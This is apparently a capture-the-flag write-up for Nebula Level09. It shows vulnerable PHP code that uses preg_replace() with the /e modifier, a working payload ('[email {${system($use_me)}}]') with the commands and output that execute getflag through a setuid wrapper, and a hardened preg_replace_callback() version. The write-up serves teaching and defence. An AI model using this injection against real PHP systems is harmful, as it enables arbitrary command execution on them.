Level09 provides us with a setuid C wrapper (flag09) around some vulnerable PHP code (flag09.php):
<?php
function spam($email)
{
    $email = preg_replace("/\./", " dot ", $email);
    $email = preg_replace("/@/", " AT ", $email);
    return $email;
}

function markup($filename, $use_me)
{
    $contents = file_get_contents($filename);
    // /e: the replacement string is evaluated as PHP code after \2 is substituted
    $contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);
    $contents = preg_replace("/\[/", "<", $contents);
    $contents = preg_replace("/\]/", ">", $contents);
    return $contents;
}

$output = markup($argv[1], $argv[2]);
print $output;
?>
As you can see in the code above, the second argument, $use_me, is passed into markup() but never referenced there. That matters because the preg_replace() call on the "[email ...]" pattern uses the /e (PREG_REPLACE_EVAL) modifier: after the backreference is substituted, the replacement string is evaluated as PHP code, and that evaluation happens inside markup()'s own scope, where $use_me is a local variable we control from the command line.
The /e modifier of preg_replace() is a well-known dangerous feature: it was deprecated in PHP 5.5.0 and removed in PHP 7.0.0 in favour of preg_replace_callback(). Several sources found while researching it describe the behaviour, and one of them also provided an exploitation example.
Let's inject our getflag command through the $use_me argument, using the exploitation method from that write-up:
level09@nebula:/home/flag09$ echo '[email {${system($use_me)}}]' > /tmp/useme
level09@nebula:~$ cd /home/flag09/
level09@nebula:/home/flag09$ ./flag09 /tmp/useme getflag
You have successfully executed getflag on a target account
PHP Notice: Undefined variable: You have successfully executed getflag on a target account in /home/flag09/flag09.php(15) : regexp code on line 1
Looks like the injection was successful: we receive the output indicating that getflag ran as the flag09 user. Tracing the execution explains both lines of output. The regex captures {${system($use_me)}} as \2, so the replacement becomes spam("{${system($use_me)}}"), which /e evaluates as PHP. Inside a double-quoted string, {${expr}} is PHP's complex variable syntax: system($use_me) runs first (executing getflag, which prints the success message), and its return value, the last line of the command's output, is then treated as a variable name, which is what the "Undefined variable" notice complains about. The payload deliberately avoids quote characters, because preg_replace() with /e backslash-escapes single quotes, double quotes and backslashes in substituted backreferences before evaluation.
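As an added example (not the original flag09.php and not part of the Nebula challenge), here is the same markup() logic with the /e modifier replaced by preg_replace_callback(), which is the fix the PHP project recommended when /e was deprecated. The captured e-mail text now reaches spam() as a plain string argument and is never evaluated, so the Level09 payload comes out as inert text. The function name markup_safe and the two input strings are constructed for this example.

```php
<?php
// Added example: hardened version of the Level09 markup() routine.
// Not the original flag09.php; markup_safe() and the inputs are constructed here.

function spam($email)
{
    $email = preg_replace("/\./", " dot ", $email);
    $email = preg_replace("/@/", " AT ", $email);
    return $email;
}

function markup_safe($contents)
{
    // preg_replace_callback() hands the match array to a closure; $m[2] is the
    // text captured by the second group. It is used as data, never as code, so
    // nothing the input contains can reach eval() or the caller's variables.
    $contents = preg_replace_callback(
        "/(\[email (.*)\])/",
        function ($m) {
            return spam($m[2]);
        },
        $contents
    );
    $contents = preg_replace("/\[/", "<", $contents);
    $contents = preg_replace("/\]/", ">", $contents);
    return $contents;
}

// Constructed inputs: a benign tag and the Level09 payload.
$benign  = "[email user@example.com]";
$payload = '[email {${system($use_me)}}]';

echo markup_safe($benign), "\n";   // user AT example dot com
echo markup_safe($payload), "\n";  // {${system($use_me)}}  (printed literally, nothing executed)
```

On PHP 7 and later the original script cannot be exploited this way at all, but it does not work either: preg_replace() emits "Unknown modifier 'e'" and returns NULL, so the page renders empty. The callback form runs unchanged on PHP 5.x and 7.x+, which is why it is the right replacement rather than simply dropping the modifier and losing the spam() transformation.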